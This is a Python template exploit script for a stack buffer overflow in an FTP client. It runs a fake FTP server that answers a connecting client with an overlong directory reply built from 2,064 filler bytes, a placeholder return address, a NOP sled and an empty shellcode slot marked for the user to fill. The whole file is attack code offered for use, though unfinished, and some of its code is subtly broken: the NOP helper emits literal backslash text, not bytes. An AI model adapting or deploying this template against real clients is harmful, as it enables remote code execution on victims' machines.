#!/usr/bin/env python
# $Id: template_exploit.py,v 1.0 2018/07/08 00:44:56 dhn Exp $

import sys
import socket
import struct
import argparse

class Exploit:

	def __init__(self, server, port, payload):
		self._payload = payload
		self._server = server
		self._port = port

	def __listen(self):
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.bind((self._server, self._port))
		s.listen(5)
		return s.accept()

	def run(self):
		while True:
			try:
				conn, addr = self.__listen()
				conn.send("220 Welcome!\r\n")
				conn.recv(1024)
				conn.send("331 OK.\r\n")
				conn.recv(1024)
				conn.send("230 OK.\r\n")
				conn.recv(1024)
				conn.send("220 " + self._payload + " is current directory\r\n")
				conn.recv(1024)
				conn.send("257\r\n")
			except socket.error:
				print("[+] Done")
				sys.exit(0)

def p(x):
	return struct.pack("<L", x)

def nops(size=1024):
	return "\\x90" * size

def main(args):
	# TODO: Change me!
	shellcode = ()

	call_esp = p(0xdeadbeef)

	# PAYLOAD
	payload = "A" * 2064
	payload += call_esp
	payload += nops(1337)
	payload += shellcode

	exploit = Exploit(args.host, int(args.port), payload)
	print("[+] FTP Client exploit")
	print("[+] Listen on %s:%s" % (args.host, args.port))

	if exploit.run():
		print("[!] Fail")
	else:
		print("[+] Done")


if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	parser.add_argument("--host", help="Target hostname or ip", required=True)
	parser.add_argument("--port", help="Target port", required=True)
	args = parser.parse_args()

	main(args)
